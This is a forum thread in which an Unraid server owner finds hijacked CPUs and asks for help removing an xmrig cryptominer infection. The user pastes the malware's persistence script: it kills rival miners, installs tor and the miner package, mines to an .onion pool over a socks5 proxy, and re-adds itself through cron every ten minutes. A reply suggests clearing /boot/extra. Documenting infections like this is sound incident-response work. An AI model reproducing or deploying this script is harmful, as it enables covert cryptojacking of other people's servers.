vcadieux Posted July 13, 2023 Share Posted July 13, 2023 (edited) Hello, I noticed my Unraid server had 100% cpu on each core so I started digging where was the issue and I found using htop that multiples process xmrig are running, those seems to be related to crypto mining. I immediately disabled all port forwarding on my router as it was probably from there that someone hijacked my server and I also shut down the docker engine but the processes are still there. The only VM I have is also off. I've checked the go file and nothing wrong there so I am a bit lost. It's very hard to access the Unraid WEBUI as it is so cpu overloaded and it barely respond. I've attached the diagnostic file to this post if anyone can help me fixing this once for all. In the diagnostic file I found this line in /system/ps.txt : root 2918 0.0 0.0 16856 4180 ? Ssl 18:15 0:00 xmrig -o ipdsq3672auzcvfoykoyfraco5jarogwvkt4e4eiq2vv7liupvkn73qd.onion:3333 -u H19-i5-11600K -p x --cpu-max-threads-hint=75 -x socks5://127.0.0.1:25372 -B How do I remove this ? unraidserver-diagnostics-20230712-2116.zip Edited July 13, 2023 by vcadieux Link to comment
vcadieux Posted July 13, 2023 Author Share Posted July 13, 2023 (edited) So after looking carefully inside my usb drive here is what I found : in the file /config/wireguard/go : mid=H19-i5-11600K if pgrep -f "c3pool" > /dev/null then kill -9 $(pgrep -f "c3pool") sleep 5 fi if ! pgrep -x "tor" > /dev/null then installpkg /boot/extra/snowflake.txz tor fi if ! pgrep -x "xmrig" > /dev/null then installpkg /boot/extra/rig-6.1.19.2-linux-static-x64.txz xmrig -o ipdsq3672auzcvfoykoyfraco5jarogwvkt4e4eiq2vv7liupvkn73qd.onion:3333 -u $mid -p x --cpu-max-threads-hint=75 -x socks5://127.0.0.1:25372 -B fi if ! crontab -l | grep -q wireguard > /dev/null then crontab -l | { cat; echo "*/10 * * * * /bin/bash /boot/config/wireguard/go"; } | crontab - fi In the file /config/go : #!/bin/bash # Start the Management Utility tor /usr/local/sbin/emhttp & /bin/bash /boot/config/wireguard/go So I removed the tor line and this one : /bin/bash /boot/config/wireguard/go and rebooted. I also removed everything inside /config/wireguard/go The process doesn't seem to come back but still, there is a package called rig-6.1.19.2-linux-static-x64.txz being installed everytime during the boot process (before the unraid login prompt) see attached picture. Searching for this package name (rig-6.1.19.2-linux-static-x64.txz) using Notepad++ in all the file on the USB key doesn't give me any result.... Any help would be appreciated ! Edited July 13, 2023 by vcadieux Link to comment
JorgeB Posted July 13, 2023 Share Posted July 13, 2023 If there are any files inside /boot/extra remove them. Link to comment
Recommended Posts